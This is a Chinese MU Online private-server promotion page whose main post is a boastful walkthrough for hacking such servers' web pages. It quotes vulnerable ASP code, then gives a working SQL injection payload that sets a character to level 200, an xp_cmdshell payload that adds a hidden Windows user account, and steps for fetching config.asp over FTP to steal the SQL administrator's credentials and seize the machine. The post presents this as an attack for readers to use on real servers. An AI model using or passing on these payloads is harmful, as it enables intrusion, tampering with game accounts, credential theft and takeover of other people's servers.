本奇迹私服宣传网,每日更新,包含所有新开奇迹私服,高人气私服,WWW.17MU.COM是你寻找最佳的奇迹私服的乐园,请随时关注我们的网站!给你最全面的奇迹私服新服务! 首页|收藏  
   网站首页 | 免费发布私服 | 固顶广告管理 广告联系 | 广告客服QQ:469978
奇迹怪物掉物品的资料,新手可以看看! 奇迹私服冲黄金宝箱的方法 奇迹私服如何利用WIN2K实现2个网段
为什么进入游戏后就出现与服务连接中断? 奇迹私服合+6披风不用玛亚之石头的方法 奇迹私服MUSF防黑不完全手册(菜鸟版)
为什么输入帐号时提示连接版本不正确? 奇迹私服提供新地图——放逐地的补丁下载 奇迹私服解决大额交易问题!发行新流货币
为什么有些奇迹私服又上不去了? 奇迹私服关于古代竞技场的去竞技场2 奇迹私服服务端更改IP的方法
冲+9戒指和项链的方法!!! 魔剑拿毁灭+盾牌+戴头盔方法 奇迹私服加固sql的安全
奇迹私服一条龙架设
入侵奇迹私服网页漏洞
嘻~~! 昨天朋友说他的帐号给GM删了~ 发个IP给我叫我帮他看一下!!

呵~~~ 原来网页有SQL INJECTION漏洞!!爽死了!!这下你们要看好了`~

玩MU的朋友不要错过!!

在******.asp中,没有对userchr进行过滤,导致SQL注入.. 不给你文件名!!自己找吧!

<!--#include file="conn.asp" -->
<!--#include file="top.asp" -->
<%
n=request.form("username")
p=request.form("userchr")

if instr(n,"\'")<>0 then response.end
if instr(n,"=")<>0 then response.end
if instr(n,"%")<>0 then response.end

if n<>"" and p<>"" then
set rs1 = Server.CreateObject("ADODB.Recordset")
sql="select * from Character where AccountID=\'"&n&"\' and Name=\'"&p&"\' and pklevel<>3"
rs1.open sql,conn,1,3

只对username进行了过滤,不够严密饿.:)

下面把clearpk.asp 另存为本地htm文件,然后把action="clearPK.asp"改为action="http://服务器/clearpk.asp,,把表单项里的maxlength去掉..OK..
在角色名称里输入: XX\';update character set clevel=200 where accountID=\'YOUID\';--
在用户名里输入:haha
好了,你的人物已经200级了饿..

如过管理员未对xp_cmdshell存储过程进行限止,那么你还可以把上面的语句换为:
XX\';exec master..xp_cmdshell \'net user hu_ti$ 123 /add\';--
加了一个用户饿..

测试发现,大部分的管理员都是进行远程管理..(FTP管理),
所以你在得到了一个合法用户以后可以ftp XXXX(服务器IP)->登陆->get config.asp;
config.asp记录了SQL管理员的用户名和密码.
最后下载个SQL远程执行系统命令的程序。。
然后呢,一台肉鸡诞生了...哈哈。

 

 

 

 

 


免责声明:1314mu.com登载之所有信息及资源均出于传递更多信息之目的,并不意味着1314mu.com赞同其观点或证实其描述.本站所有信息均为免费发布,并非赢利及商业目的。
Copyright © 2004-2009 www.1314mu.com All Rights Reserved

奇迹私服 新开奇迹私服 最新奇迹私服 MU私服 奇迹SF